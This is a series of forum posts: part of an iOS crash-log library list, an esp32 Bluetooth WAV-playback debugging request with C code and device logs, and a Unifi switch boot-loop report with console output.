CommunicationsFilter arm64 /System/Library/PrivateFrameworks/CommunicationsFilter.framework/CommunicationsFilter 0x191da0000 - 0x191e29fff CoreSymbolication arm64 /System/Library/PrivateFrameworks/CoreSymbolication.framework/CoreSymbolication 0x191f57000 - 0x191f5dfff IncomingCallFilter arm64 <6e1f7dcfa63d39a7a167f99cfa161bca> /System/Library/PrivateFrameworks/IncomingCallFilter.framework/IncomingCallFilter 0x192188000 - 0x19218ffff CoreTime arm64 /System/Library/PrivateFrameworks/CoreTime.framework/CoreTime 0x192d17000 - 0x192d69fff ToneLibrary arm64 <973f74467c953f92ab1b2f58fcce727b> /System/Library/PrivateFrameworks/ToneLibrary.framework/ToneLibrary 0x1936d4000 - 0x19378afff BulletinBoard arm64 <55e3a30ccae23e409d24b0bddaf9f658> /System/Library/PrivateFrameworks/BulletinBoard.framework/BulletinBoard 0x195dbb000 - 0x195e84fff VideoSubscriberAccount arm64 /System/Library/Frameworks/VideoSubscriberAccount.framework/VideoSubscriberAccount 0x1a0a5c000 - 0x1a0a6dfff DeviceIdentity arm64 <4f5d7a89c9a339b4b4fbc101fe35f4e5> /System/Library/PrivateFrameworks/DeviceIdentity.framework/DeviceIdentity 0x1a812a000 - 0x1a812dfff InternationalSupport arm64 /System/Library/PrivateFrameworks/InternationalSupport.framework/InternationalSupport 0x1abb28000 - 0x1abb58fff libclosured.dylib arm64 <23ea8cc8f66931e4a59c47fb92b8baaa> /uslib/closure/libclosured.dylib
submitted by batreky to jailbreak [link] [comments]

Can anyone help debug this please? Trying to get WAV to play to bluetooth speaker using esp32 ADF.

Hello
I have been trying without luck for a couple of days to play a WAV file from a plain esp32 using the ADF (no lyra, no additional components), to a bluetooth speaker.
I can't get it work. My code is below, and under that is a log of the build and execution.
The things I notice most in the log are these lines:
W (7806) SPIFFS_STREAM: No more data, ret:0 W (7896) BT_APPL: ### UNDERFLOW :: ONLY READ 428 BYTES OUT OF 512 ###
Any help would be much appreciated - if anyone can help me to get a WAV to play from spiffs it would be much appreciated!
thanks


/* Play music from Bluetooth device

This example code is in the Public Domain (or CC0 licensed, at your option.)

Unless required by applicable law or agreed to in writing, this
software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied.
*/
#include
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "audio_common.h"
#include "audio_element.h"
#include "audio_event_iface.h"
#include "audio_pipeline.h"
#include "bluetooth_service.h"
#include "esp_log.h"
#include "esp_peripherals.h"
#include "wav_decoder.h"
#include "nvs_flash.h"
#include "sdkconfig.h"
#include "periph_spiffs.h"
#include "spiffs_stream.h"


#define SAVE_FILE_RATE 22050
#define SAVE_FILE_CHANNEL 1
#define SAVE_FILE_BITS 8

#define PLAYBACK_RATE 44100
#define PLAYBACK_CHANNEL 2
#define PLAYBACK_BITS 16

static const char *TAG = "BLUETOOTH_SOURCE_EXAMPLE";

static audio_element_handle_t create_spiffs_stream(int sample_rates, int bits, int channels, audio_stream_type_t type)
{
spiffs_stream_cfg_t spiffs_cfg = SPIFFS_STREAM_CFG_DEFAULT();
spiffs_cfg.type = type;
audio_element_handle_t spiffs_stream = spiffs_stream_init(&spiffs_cfg);
mem_assert(spiffs_stream);
audio_element_info_t writer_info = {0};
audio_element_getinfo(spiffs_stream, &writer_info);
writer_info.bits = bits;
writer_info.channels = channels;
writer_info.sample_rates = sample_rates;
audio_element_setinfo(spiffs_stream, &writer_info);
return spiffs_stream;
}

void app_main(void)
{
//nvs_flash_erase();
esp_err_t err = nvs_flash_init();
if (err == ESP_ERR_NVS_NO_FREE_PAGES) {
// NVS partition was truncated and needs to be erased
// Retry nvs_flash_init
ESP_ERROR_CHECK(nvs_flash_erase());
err = nvs_flash_init();
}


audio_pipeline_handle_t pipeline;
audio_element_handle_t spiffs_reader_el, filter_upsample_el, wav_decoder, bt_stream_writer;

// Initialize peripherals management
esp_periph_config_t periph_cfg = { 0 };
esp_periph_init(&periph_cfg);

// Initialize Spiffs peripheral
periph_spiffs_cfg_t spiffs_cfg = {
.root = "/spiffs",
.partition_label = NULL,
.max_files = 5,
.format_if_mount_failed = true
};
esp_periph_handle_t spiffs_handle = periph_spiffs_init(&spiffs_cfg);

// Start spiffs peripheral
esp_periph_start(spiffs_handle);

// Wait until spiffs was mounted
while (!periph_spiffs_is_mounted(spiffs_handle)) {
vTaskDelay(100 / portTICK_PERIOD_MS);
}



esp_log_level_set("*", ESP_LOG_INFO);
esp_log_level_set(TAG, ESP_LOG_DEBUG);

ESP_LOGI(TAG, "[ 1 ] Create Bluetooth service");
bluetooth_service_cfg_t bt_cfg = {
.device_name = "ESP-ADF-SOURCE",
.mode = BLUETOOTH_A2DP_SOURCE,
.remote_name = "BT-12",
};
bluetooth_service_start(&bt_cfg);

ESP_LOGI(TAG, "[1.1] Get Bluetooth stream");
bt_stream_writer = bluetooth_service_create_stream();

ESP_LOGI(TAG, "[ 2 ] Create SPIFFS stream to read data");
spiffs_reader_el = create_spiffs_stream(SAVE_FILE_RATE, SAVE_FILE_BITS, SAVE_FILE_CHANNEL, AUDIO_STREAM_READER);


ESP_LOGI(TAG, "[ 3 ] Create wav decoder to decode wav file");
wav_decoder_cfg_t wavdec_cfg = DEFAULT_WAV_DECODER_CONFIG();
wav_decoder = wav_decoder_init(&wavdec_cfg);
//audio_element_set_read_cb(wav_decoder, wav_music_read_cb, NULL);

ESP_LOGI(TAG, "[ 4 ] Create audio pipeline for BT Source");
audio_pipeline_cfg_t pipeline_cfg = DEFAULT_AUDIO_PIPELINE_CONFIG();
pipeline = audio_pipeline_init(&pipeline_cfg);

ESP_LOGI(TAG, "[4.1] Register all elements to audio pipeline");
audio_pipeline_register(pipeline, spiffs_reader_el, "spiffs_reader");
audio_pipeline_register(pipeline, wav_decoder, "wav");
audio_pipeline_register(pipeline, bt_stream_writer, "bt");

ESP_LOGI(TAG, "[4.2] Link it together wav_decoderbt_stream_writer");
audio_pipeline_link(pipeline, (const char *[]) {"spiffs_reader", "wav", "bt"}, 3);

audio_element_set_uri(spiffs_reader_el, "/spiffs/pcm1644sSHORT.wav");

ESP_LOGI(TAG, "[5.1] Create Bluetooth peripheral");
esp_periph_handle_t bt_periph = bluetooth_service_create_periph();

ESP_LOGI(TAG, "[5.2] Start Bluetooth peripheral");
esp_periph_start(bt_periph);
ESP_LOGI(TAG, "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");

ESP_LOGI(TAG, "[ 6 ] Setup event listener");
audio_event_iface_cfg_t evt_cfg = AUDIO_EVENT_IFACE_DEFAULT_CFG();
audio_event_iface_handle_t evt = audio_event_iface_init(&evt_cfg);

ESP_LOGI(TAG, "[6.1] Listening event from all elements of pipeline");
audio_pipeline_set_listener(pipeline, evt);

ESP_LOGI(TAG, "[6.2] Listening event from peripherals");
audio_event_iface_set_listener(esp_periph_get_event_iface(), evt);

ESP_LOGI(TAG, "[ 7 ] Start audio_pipeline");
audio_pipeline_run(pipeline);

ESP_LOGI(TAG, "[ 8 ] Listen for all pipeline events");
while (1) {
audio_event_iface_msg_t msg;
esp_err_t ret = audio_event_iface_listen(evt, &msg, portMAX_DELAY);
if (ret != ESP_OK) {
ESP_LOGE(TAG, "[ * ] Event interface error : %d", ret);
continue;
}

ESP_LOGI(TAG, "[ * ] Audio event");
ESP_LOGI(TAG, "[ * ] Free heap: %u", xPortGetFreeHeapSize());
ESP_LOGI(TAG, "[ * ] msg.cmd: %d", msg.cmd);

if (msg.source_type == AUDIO_ELEMENT_TYPE_ELEMENT && msg.source == (void *) wav_decoder
&& msg.cmd == AEL_MSG_CMD_REPORT_MUSIC_INFO) {
audio_element_info_t music_info = {0};
audio_element_getinfo(wav_decoder, &music_info);

ESP_LOGI(TAG, "[ * ] Receive music info from wav decoder, sample_rates=%d, bits=%d, ch=%d",
music_info.sample_rates, music_info.bits, music_info.channels);

audio_element_setinfo(bt_stream_writer, &music_info);
//i2s_stream_set_clk(bt_stream_writer, music_info.sample_rates, music_info.bits, music_info.channels);
continue;
}


/* Stop when the Bluetooth is disconnected or suspended */
if (msg.source_type == PERIPH_ID_BLUETOOTH
&& msg.source == (void *)bt_periph) {
if ((msg.cmd == PERIPH_BLUETOOTH_DISCONNECTED) || (msg.cmd == PERIPH_BLUETOOTH_AUDIO_SUSPENDED)) {
ESP_LOGW(TAG, "[ * ] Bluetooth disconnected or suspended");
periph_bluetooth_stop(bt_periph);
break;
}
}
}

ESP_LOGI(TAG, "[ 9 ] Stop audio_pipeline");
audio_pipeline_terminate(pipeline);

/* Terminate the pipeline before removing the listener */
audio_pipeline_remove_listener(pipeline);

/* Stop all peripherals before removing the listener */
esp_periph_stop_all();
audio_event_iface_remove_listener(esp_periph_get_event_iface(), evt);

/* Make sure audio_pipeline_remove_listener & audio_event_iface_remove_listener are called before destroying event_iface */
audio_event_iface_destroy(evt);

/* Release all resources */
audio_pipeline_unregister(pipeline, spiffs_reader_el);
audio_pipeline_unregister(pipeline, bt_stream_writer);
audio_pipeline_unregister(pipeline, wav_decoder);
//audio_pipeline_deinit(spiffs_reader_el);
audio_pipeline_deinit(pipeline);
audio_element_deinit(bt_stream_writer);
audio_element_deinit(wav_decoder);
esp_periph_destroy();
bluetooth_service_destroy();
}


Here is the output of make:

$ make flash
Flashing binaries to serial port /dev/cu.SLAB_USBtoUART (app at offset 0x10000 )...
esptool.py v2.6-beta1
Serial port /dev/cu.SLAB_USBtoUART
Connecting........_
Chip is ESP32D0WDQ6 (revision 0)
Features: WiFi, BT, Dual Core, Coding Scheme None
MAC: 24:0a:c4:81:5c:a0
Uploading stub...
Running stub...
Stub running...
Configuring flash size...
Auto-detected Flash size: 4MB
Compressed 21344 bytes to 12567...
Wrote 21344 bytes (12567 compressed) at 0x00001000 in 1.1 seconds (effective 153.4 kbit/s)...
Hash of data verified.
Compressed 864656 bytes to 507801...
Wrote 864656 bytes (507801 compressed) at 0x00010000 in 44.9 seconds (effective 154.2 kbit/s)...
Hash of data verified.
Compressed 3072 bytes to 134...
Wrote 3072 bytes (134 compressed) at 0x00008000 in 0.0 seconds (effective 1522.8 kbit/s)...
Hash of data verified.

Leaving...
Hard resetting via RTS pin...

Here is the output of the log from running it:

$ make monitor
MONITOR
--- idf_monitor on /dev/cu.SLAB_USBtoUART 115200 ---
--- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H ---
ets Jun 8 2016 00:22:57

rst:0x1 (POWERON_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
ets Jun 8 2016 00:22:57

rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0018,len:4
load:0x3fff001c,len:5996
load:0x40078000,len:9176
load:0x40080000,len:6064
0x40080000: _WindowOverflow4 at /Users/andrewstuartsupercoders/esp/esp-adf/esp-idf/components/freertos/xtensa_vectors.S:1685

entry 0x40080330
0x40080330: _KernelExceptionVector at ??:?

I (29) boot: ESP-IDF v3.1.1-6-g2aa9a2118 2nd stage bootloader
I (29) boot: compile time 16:28:24
I (40) boot: Enabling RNG early entropy source...
I (40) boot: SPI Speed : 40MHz
I (40) boot: SPI Mode : DIO
I (43) boot: SPI Flash Size : 4MB
I (47) boot: Partition Table:
I (50) boot: ## Label Usage Type ST Offset Length
I (57) boot: 0 nvs WiFi data 01 02 00009000 00005000
I (65) boot: 1 otadata OTA data 01 00 0000e000 00002000
I (72) boot: 2 app0 OTA app 00 10 00010000 00300000
I (80) boot: 3 eeprom Unknown data 01 99 00310000 00001000
I (87) boot: 4 spiffs Unknown data 01 82 00311000 000ef000
I (95) boot: End of partition table
I (99) esp_image: segment 0: paddr=0x00010020 vaddr=0x3f400020 size=0x2941c (168988) map
I (141) esp_image: segment 1: paddr=0x00039444 vaddr=0x3ffc0000 size=0x031e8 ( 12776) load
I (144) esp_image: segment 2: paddr=0x0003c634 vaddr=0x3ffc31e8 size=0x00000 ( 0) load
I (148) esp_image: segment 3: paddr=0x0003c63c vaddr=0x40080000 size=0x00400 ( 1024) load
0x40080000: _WindowOverflow4 at /Users/andrewstuartsupercoders/esp/esp-adf/esp-idf/components/freertos/xtensa_vectors.S:1685

I (157) esp_image: segment 4: paddr=0x0003ca44 vaddr=0x40080400 size=0x035cc ( 13772) load
I (169) esp_image: segment 5: paddr=0x00040018 vaddr=0x400d0018 size=0x94d54 (609620) map
0x400d0018: _flash_cache_start at ??:?

I (295) esp_image: segment 6: paddr=0x000d4d74 vaddr=0x400839cc size=0x0e3e0 ( 58336) load
0x400839cc: spi_flash_read_encrypted at /Users/andrewstuartsupercoders/esp/esp-adf/esp-idf/components/spi_flash/flash_ops.c:634

I (308) esp_image: segment 7: paddr=0x000e315c vaddr=0x400c0000 size=0x00000 ( 0) load
I (308) esp_image: segment 8: paddr=0x000e3164 vaddr=0x50000000 size=0x00000 ( 0) load
I (318) boot: Loaded app from partition at offset 0x10000
I (321) boot: Disabling RNG early entropy source...
I (327) cpu_start: Pro cpu up.
I (330) cpu_start: Starting app cpu, entry point is 0x40081008
0x40081008: call_start_cpu1 at /Users/andrewstuartsupercoders/esp/esp-adf/esp-idf/components/esp32/cpu_start.c:231

I (0) cpu_start: App cpu up.
I (341) heap_init: Initializing. RAM available for dynamic allocation:
I (347) heap_init: At 3FFAFF10 len 000000F0 (0 KiB): DRAM
I (354) heap_init: At 3FFCAEE0 len 00015120 (84 KiB): DRAM
I (360) heap_init: At 3FFE0440 len 00003BC0 (14 KiB): D/IRAM
I (366) heap_init: At 3FFE4350 len 0001BCB0 (111 KiB): D/IRAM
I (372) heap_init: At 40091DAC len 0000E254 (56 KiB): IRAM
I (379) cpu_start: Pro cpu start user code
I (24) cpu_start: Starting scheduler on PRO CPU.
I (0) cpu_start: Starting scheduler on APP CPU.
I (186) PERIPH_SPIFFS: Partition size: total: 892556, used: 95882
I (186) BLUETOOTH_SOURCE_EXAMPLE: [ 1 ] Create Bluetooth service
I (186) BTDM_INIT: BT controller compile version [7b0770a]

I (196) system_api: Base MAC address is not set, read default base MAC address from BLK0 of EFUSE
I (256) phy: phy_version: 4000, b6198fa, Sep 3 2018, 15:11:06, 0, 0
I (656) BLUETOOTH_SERVICE: Starting device discovery...
I (656) BLUETOOTH_SOURCE_EXAMPLE: [1.1] Get Bluetooth stream
I (656) BLUETOOTH_SOURCE_EXAMPLE: [ 2 ] Create SPIFFS stream to read data
I (666) BLUETOOTH_SOURCE_EXAMPLE: [ 3 ] Create wav decoder to decode wav file
I (666) BLUETOOTH_SOURCE_EXAMPLE: [ 4 ] Create audio pipeline for BT Source
I (676) BLUETOOTH_SERVICE: Discovery started.
I (676) BLUETOOTH_SOURCE_EXAMPLE: [4.1] Register all elements to audio pipeline
I (696) BLUETOOTH_SOURCE_EXAMPLE: [4.2] Link it together wav_decoderbt_stream_writer
I (696) AUDIO_PIPELINE: audio_pipeline_link:0x3ffe17c0, spiffs_reader, 0x3ffdfed0
I (706) AUDIO_PIPELINE: audio_pipeline_link:0x3ffdf42c, wav, 0x3ffdefc4
I (716) BLUETOOTH_SOURCE_EXAMPLE: [5.1] Create Bluetooth peripheral
I (726) BLUETOOTH_SOURCE_EXAMPLE: [5.2] Start Bluetooth peripheral
I (726) BLUETOOTH_SOURCE_EXAMPLE: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
I (736) BLUETOOTH_SOURCE_EXAMPLE: [ 6 ] Setup event listener
I (746) BLUETOOTH_SOURCE_EXAMPLE: [6.1] Listening event from all elements of pipeline
I (756) BLUETOOTH_SOURCE_EXAMPLE: [6.2] Listening event from peripherals
I (756) BLUETOOTH_SOURCE_EXAMPLE: [ 7 ] Start audio_pipeline
I (766) AUDIO_ELEMENT: [spiffs_reader] audio_element_run
I (776) AUDIO_ELEMENT: [spiffs_reader] Element task created
I (776) AUDIO_ELEMENT: [wav] audio_element_run
I (786) AUDIO_ELEMENT: [wav] Element task created
I (786) AUDIO_ELEMENT: [bt] audio_element_run
I (796) AUDIO_ELEMENT: [bt] Element task created
I (796) AUDIO_PIPELINE: Func:audio_pipeline_run, Line:278, MEM Total:93732 Bytes

I (806) AUDIO_ELEMENT: [spiffs_reader] AEL_MSG_CMD_RESUME,state:1
I (816) AUDIO_ELEMENT: [wav] AEL_MSG_CMD_RESUME,state:1
I (816) SPIFFS_STREAM: File size is 46040 byte, pos:0
I (836) AUDIO_PIPELINE: Pipeline started
I (836) BLUETOOTH_SOURCE_EXAMPLE: [ 8 ] Listen for all pipeline events
I (836) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (846) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 93340
I (846) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 8
I (856) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (866) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 93340
I (866) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 8
I (876) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (876) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 93340
I (886) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 9
I (886) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Receive music info from wav decoder, sample_rates=44100, bits=16, ch=2
I (4626) BLUETOOTH_SERVICE: Scanned device: fc:58:fa:5b:f3:1b
I (4626) BLUETOOTH_SERVICE: --Class of Device: 0x260404
I (4626) BLUETOOTH_SERVICE: --RSSI: -61
I (4636) BLUETOOTH_SERVICE: --Name: BT-12
I (4636) BLUETOOTH_SERVICE: Found a target device, address fc:58:fa:5b:f3:1b, name BT-12
I (4646) BLUETOOTH_SERVICE: Cancel device discovery ...
I (4656) BLUETOOTH_SERVICE: Device discovery stopped.
I (4656) BLUETOOTH_SERVICE: a2dp connecting to peer: BT-12
E (4666) BT_APPL: reset flags
I (4666) BLUETOOTH_SERVICE: bt_a2d_source_cb state 4, evt 0x0
I (7356) BLUETOOTH_SERVICE: authentication success: BT-12
I (7356) BLUETOOTH_SERVICE: fc 58 fa 5b f3 1b
I (7356) BLUETOOTH_SERVICE: ESP_BT_GAP_PIN_REQ_EVT min_16_digit:253
I (7366) BLUETOOTH_SERVICE: Input pin code: 0000 0000 0000 0000
W (7376) BT_BTM: BTM_PINCodeReply() - Wrong State: 0

E (7386) BT_APPL: bta_av_rc_create ACP handle exist for shdl:0
W (7586) BT_APPL: new conn_srvc id:18, app_id:0
I (7586) BLUETOOTH_SERVICE: bt_a2d_source_cb state 4, evt 0x0
I (7586) BLUETOOTH_SERVICE: a2dp connected
I (7586) BLUETOOTH_SERVICE: a2dp media ready checking ...
I (7586) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (7596) BLUETOOTH_SERVICE: bt_a2d_source_cb state 5, evt 0x3
I (7596) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 88736
I (7606) BLUETOOTH_SERVICE: a2dp media ready, starting ...
I (7616) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 1
W (7616) BT_APPL: new conn_srvc id:18, app_id:1
I (7636) BT_LOG: bta_av_link_role_ok hndl:x41 role:0 conn_audio:x1 bits:1 features:x824b

I (7636) BLUETOOTH_SERVICE: bt_a2d_source_cb state 5, evt 0x3
I (7646) BLUETOOTH_SERVICE: a2dp media start successfully.
I (7656) BLUETOOTH_SERVICE: bt_a2d_source_cb state 5, evt 0x1
W (7806) SPIFFS_STREAM: No more data, ret:0
I (7806) AUDIO_ELEMENT: IN-[spiffs_reader] AEL_IO_DONE,0
I (7806) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (7806) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 91100
I (7816) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 8
I (7866) AUDIO_ELEMENT: IN-[wav] AEL_IO_DONE,-2
I (7866) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (7866) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 86976
I (7866) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 8
W (7896) BT_APPL: ### UNDERFLOW :: ONLY READ 428 BYTES OUT OF 512 ###
W (7896) BT_APPL: btc_media_aa_prep_sbc_2_send underflow 1, 428
I (7926) AUDIO_ELEMENT: IN-[bt] AEL_IO_DONE,-2
W (7926) BT_APPL: ### UNDERFLOW :: ONLY READ -2 BYTES OUT OF 84 ###
W (7926) BT_APPL: btc_media_aa_prep_sbc_2_send underflow 12, 426
I (7926) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Audio event
I (7936) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Free heap: 91100
I (7946) BLUETOOTH_SOURCE_EXAMPLE: [ * ] msg.cmd: 4
W (7946) BLUETOOTH_SOURCE_EXAMPLE: [ * ] Bluetooth disconnected or suspended
W (7956) BT_APPL: btc_get_num_aa_frame() - Limiting frames to be sent from 22 to 21
I (7956) BLUETOOTH_SOURCE_EXAMPLE: [ 9 ] Stop audio_pipeline
I (7966) AUDIO_ELEMENT: IN-[bt] AEL_IO_DONE,-2
W (7976) BT_APPL: ### UNDERFLOW :: ONLY READ -2 BYTES OUT OF 86 ###
W (7966) AUDIO_PIPELINE: There are no listener registered
W (7986) BT_APPL: btc_media_aa_prep_sbc_2_send underflow 21, 424
W (7996) BT_APPL: btc_get_num_aa_frame() - Limiting frames to be sent from 37 to 21
/Users/andrewstuartsupercoders/esp/esp-adf/esp-idf/components/freertos/queue.c:1441 (xQueueGenericReceive)- assert failed!
abort() was called at PC 0x4008c855 on core 1
0x4008c855: xQueueGenericReceive at /Users/xxx/esp/esp-adf/esp-idf/components/freertos/queue.c:2037


Backtrace: 0x4008f790:0x3ffe13b0 0x4008f967:0x3ffe13d0 0x4008c855:0x3ffe13f0 0x400e7fcd:0x3ffe1430 0x400e70d2:0x3ffe1460 0x400e82e1:0x3ffe1490 0x4011ddad:0x3ffe14b0 0x4011dfac:0x3ffe14f0 0x4011e13e:0x3ffe1520 0x4011e17f:0x3ffe1550 0x4011e1a7:0x3ffe1570 0x4011e201:0x3ffe1590
0x4008f790: invoke_abort at /Users/xxx/esp/esp-adf/esp-idf/components/esp32/panic.c:649

0x4008f967: abort at /Users/xxx/esp/esp-adf/esp-idf/components/esp32/panic.c:649

0x4008c855: xQueueGenericReceive at /Users/xxx/esp/esp-adf/esp-idf/components/freertos/queue.c:2037

0x400e7fcd: rb_read at /Users/xxx/esp/esp-adf/components/audio_pipeline/ringbuf.c:444

0x400e70d2: audio_element_input at /Users/xxx/esp/esp-adf/components/audio_pipeline/audio_element.c:702

0x400e82e1: bt_a2d_source_data_cb at /Users/xxx/esp/esp-adf/components/audio_service/bluetooth_service.c:671

0x4011ddad: btc_aa_src_data_read at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:200
(inlined by) btc_media_aa_read_feeding at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:1201

0x4011dfac: btc_media_aa_prep_sbc_2_send at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:1348

0x4011e13e: btc_a2dp_source_prep_2_send at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:1433

0x4011e17f: btc_a2dp_source_send_aa_frame at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:1460

0x4011e1a7: btc_a2dp_source_handle_timer at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:1478

0x4011e201: btc_a2dp_source_task_handler at /Users/xxx/esp/esp-adf/esp-idf/components/bt/bluedroid/btc/profile/std/a2dp/btc_a2dp_source.c:294


Rebooting...





submitted by flibbledeedo to esp32 [link] [comments]

Unifi Switch Boot Loop

Had 7 new 48-750 Unifi Switches installed yesterday. All adopted fine and were running. This morning, 3 of them (including one that been running fine for over a year) suddenly start boot looping. Tried power cyling, tried resetting, No luck. They all just boot with a few of the port lights on 24-48 on solid, the led flashing, and boot looping. Below is the console text.
U-Boot usw-v1.1.3.109-g90a2a80b (Nov 02 2016 - 20:22:35)
DEV ID= 0000db56 SKU ID = 0x8344 DDR type: DDR3 MEMC 0 DDR speed = 667MHz Validate Shmoo parameters stored in flash ..... OK Press Ctrl-C to run Shmoo ..... skipped Restoring Shmoo parameters from flash ..... done Running simple memory test ..... OK DDR Tune Completed DRAM: 256 MiB WARNING: Caches not enabled
soc_pcie_hw_init : port->reg_base = 0x18012000 , its value = 0x4 PCIe port 0 in RC mode
pos is 172 ==>PCIE: LINKSTA reg 0xbe val 0x1001
port 0 is not active!!
In: serial Out: serial Err: serial Unlocking L2 Cache ...Done arm_clk=400MHz, axi_clk=200MHz, apb_clk=50MHz, arm_periph_clk=200MHz Disabling outer cache Net: Board Net Initialization Failed No ethernet found. Hit any key to stop autoboot: 0 ubnt_bootsel_init: bootsel magic=a34de82b, bootsel = 1 UBNT application initialized Boot partition selected = 1 Loading Kernel Image @ 1000000, size = 15728640 Verifying 'kernel1' parition:OK

Booting kernel from Legacy Image at 01000000 ...

Image Name: Ubiquiti 3.7.51.6230 Image Type: ARM Linux Kernel Image (uncompressed) Data Size: 14582180 Bytes = 13.9 MiB Load Address: 00018000 Entry Point: 00018000 Verifying Checksum ... OK Loading Kernel Image ... OK OK boot_prep_linux commandline: console=ttyS0,115200 [email protected] [email protected] mtdparts=spi1.0:768k(u-boot),64k(u-boot-env),64k(shmoo),15360k(kernel0),15424k(kernel1),1024k(cfg),64k(EEPROM) ubntbootid=1
Starting kernel ...
Disabling outer cache [ 0.000000] Booting Linux on physical CPU 0 [ 0.000000] Linux version 3.6.5 ([email protected]) (gcc version 4.7.2 (GCC) ) #1 SMP Wed Mar 22 15:27:16 PDT 2017 [ 0.000000] CPU: ARMv7 Processor [414fc091] revision 1 (ARMv7), cr=10c53c7d [ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache [ 0.000000] Machine: Broadcom iProc [ 0.000000] Memory policy: ECC disabled, Data cache writealloc [ 0.000000] BUG: mapping for 0x18000000 at 0xf0000000 out of vmalloc space [ 0.000000] BUG: mapping for 0x19000000 at 0xf1000000 out of vmalloc space [ 0.000000] PERCPU: Embedded 7 pages/cpu @c1c1c000 s6272 r8192 d14208 u32768 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 61952 [ 0.000000] Kernel command line: console=ttyS0,115200 [email protected] [email protected] mtdparts=spi1.0:768k(u-boot),64k(u-boot-env),64k(shmoo),15360k(kernel0),15424k(kernel1),1024k(cfg),64k(EEPROM) ubntbootid=1 ubootver=usw-v1.1.3.109-g90a2a80b [ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes) [ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes) [ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) [ 0.000000] Memory: 128MB 128MB = 256MB total [ 0.000000] Memory: 245580k/245580k available, 16564k reserved, 131072K highmem [ 0.000000] Virtual kernel memory layout: [ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB) [ 0.000000] fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB) [ 0.000000] vmalloc : 0xc8800000 - 0xf0000000 ( 632 MB) [ 0.000000] lowmem : 0xc0000000 - 0xc8000000 ( 128 MB) [ 0.000000] pkmap : 0xbfe00000 - 0xc0000000 ( 2 MB) [ 0.000000] modules : 0xbf000000 - 0xbfe00000 ( 14 MB) [ 0.000000] .text : 0xc0018000 - 0xc0311fc0 (3048 kB) [ 0.000000] .init : 0xc0312000 - 0xc0dd6880 (11027 kB) [ 0.000000] .data : 0xc0dd8000 - 0xc0e00180 ( 161 kB) [ 0.000000] .bss : 0xc0e001a4 - 0xc0e12658 ( 74 kB) [ 0.000000] SLUB: Genslabs=11, HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 [ 0.000000] Hierarchical RCU implementation. [ 0.000000] RCU restricting CPUs from NR_CPUS=4 to nr_cpu_ids=1. [ 0.000000] NR_IRQS:292 [ 0.000000] sched_clock: 32 bits at 100 Hz, resolution 10000000ns, wraps every 4294967286ms [ 0.010000] Calibrating delay loop... 795.44 BogoMIPS (lpj=3977216) [ 0.050000] pid_max: default: 4096 minimum: 301 [ 0.050000] Mount-cache hash table entries: 512 [ 0.050000] CPU: Testing write buffer coherency: ok [ 0.050000] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000 [ 0.050000] Setting up static identity map for 0x253330 - 0x253388 [ 0.050000] L310 cache controller enabled [ 0.050000] l2x0: 8 ways, CACHE_ID 0x410000c9, AUX_CTRL 0x0a120000, Cache size: 131072 B [ 0.050000] Brought up 1 CPUs [ 0.050000] SMP: Total of 1 processors activated (795.44 BogoMIPS). [ 0.050000] devtmpfs: initialized [ 0.060000] NET: Registered protocol family 16 [ 0.060000] DMA: preallocated 256 KiB pool for atomic coherent allocations [ 0.060000] GENPLL[5] mdiv=40 rate=2000000000 [ 0.060000] Sel=1 Ovr=1 Div=48 [ 0.060000] UART clock rate 50000000 [ 0.080000] bio: create slab at 0 [ 0.080000] Switching to clocksource 